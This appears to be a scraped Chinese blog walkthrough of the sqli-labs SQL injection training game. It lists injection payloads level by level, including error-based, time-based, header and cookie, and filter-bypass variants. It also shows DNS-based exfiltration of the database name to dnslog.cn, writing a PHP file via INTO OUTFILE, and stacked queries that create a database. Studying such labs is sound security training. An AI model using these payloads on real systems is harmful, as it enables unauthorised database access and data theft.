SQL注入篇 |
您所在的位置:网站首页 › sqlilabs第二关无法连接到MySQL › SQL注入篇 |
sqli-labs是训练SQL注入的一款闯关游戏,分四页,共75关,不过我还没通关。
如果你的电脑无法像下面这样正常显示可以参照文章https://admin-root.blog.csdn.net/article/details/103597999 注入语句: id=1' and 1=1 -- - 1、判断注入点注入语句: id=1 and 1=1 -- -方法同上。 less-3——基于’)的字符型注入注入语句: id=1') and 1=1 -- -方法同上。 less-4——基于")字符型注入注入语句: id=1") and 1=1 -- -方法同上。 less-5——基于’字符型的错误回显注入注入语句: id=1' union select updatexml(1,concat(0x7e,(select user()),0x7e),1) -- -效果如图: 注入语句: id=1" union select updatexml(1,concat(0x7e,(select user()),0x7e),1) -- -效果如图: 注入语句: 1')) union select 1,'',3 into outfile 'D://1.php' -- -效果如图: 注入语句: id=1' and load_file(concat("\\\\",(database()),".2bmfvu.dnslog.cn\\1.txt")) -- - 1、点击此处获取dns地址注入语句: id=1' and if(length(database())>3 ,sleep(5),1) -- -因为你不知道数据库名是几个字母,所以先让数字大于3进行判断,然后依次增加。效果如图: 注入语句: id=1" and if(length(database())>7 ,sleep(5),1) -- -方法与第九关相同,将’改成"即可。 less-11——基于’的POST型注入注入语句: admin' and 1=1 -- -这里不用密码也能登陆成功,所以判断是POST形式的单引号字符型注入 注入语句: admin") and 1=1 -- -方法同上。 less-13——基于’)的错误回显注入注入语句: admin') union select updatexml(1,concat(0x7e,(select user()),0x7e),1) -- -效果如图: 注入语句: admin" union select updatexml(1,concat(0x7e,(select user()),0x7e),1) -- -方法同上。 less-15——基于’的POST型注入(利用dns回显)注入语句: admin' and load_file(concat("\\\\",(database()),".qyfyji.dnslog.cn\\1.txt")) -- -效果如图: 注入语句: admin") and 1=1 -- -方法同上。 less-17——基于’的密码报错注入注入语句: ' and (updatexml(1,concat(0x7e, database(),0x7e),1))#从密码入手输入注入语句进行报错注入,效果如图: 注入语句: ',1,updatexml(1,concat(0x7e, database(),0x7e),1))# 1、先用Burp Suite抓取输入正确用户密码的登录页面 2、然后在报头文User-Agent:后加入注入语句即可,效果如图:注入语句: ',1,updatexml(1,concat(0x7e, database(),0x7e),1))#方法同上,只需把报头文改成Referer:即可。 less-20——基于’的Cookie:报头文报错注入注入语句: uname=' union select 1,2,(updatexml(1,concat(0x7e, database(),0x7e),1))# ;方法同上,只需把报头文改成Cookie:即可。 一、首先正常登陆进入以下页面
注入语句: uname=" union select 1,2,3# ;操作步骤同上 注入语句: id=-1' union select 1,2,3 ='1假设知道有admin用户但是不知道密码 注入语句: id=-1' union select 1,2,3--注入语句: id=-1 union select 1,2,3--注入语句: id=-1'aandnd(updatexml(1,'~aaaa',1))anandd'1'='1这里不会报错,只是多加了一个括号。 less-27——基于’过滤union、select与注释和空格的注入注入语句: id=1'and(updatexml(1,'~aaaa',1))and'1'='1单引号换成双引号,方法同上。 less-28——基于’)过滤union和select等的注入注入语句: 网址栏url转码后 id=111%27)%0AUnIon%0AAll%0ASelect%0A(%271%27),2,(%273 url 转码前 id=111') UnIon All Select ('1'),2,('3注入语句: 网址栏url后 http://localhost/sqli-labs-master/Less-28a/?id=-1%27)%0AUnIon%0AAll%0ASelect%0A1,2,3%0A--%20- url转码前 id=-1') UnIon All Select 1,2,3 -- -注入语句: id=-1' union select 1,2,3 -- -注入语句: id=1&id=-1' union select 1,2,3 -- -注入语句: id=-1" union select 1,2,3 -- -注入语句: id=1&id=-1" union select 1,2,3 -- -注入语句: id=-1") union select 1,2,3 -- -注入语句: id=1&id=-1") union select 1,2,3 -- -注入语句: id=-1%df' union select 1,2,3 -- -在网址栏输入注入语句: id=-1%df%27%20union%20select%201,2,3%20--%20-注入语句: Dumb�' union select 1,2,3 --注入语句: id=-1 union select 1,2,3注入语句: id=-1�' union select 1,2,3 -- -注入语句: id=-1�' union select 1,2,3 -- - id=-1�' union select 1,2,3 -- -注入语句: id=1;CREATE DATABASE sq default charset utf8; -- -查询id为1的用户名密码,同时创建名为sq的数据库。 |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |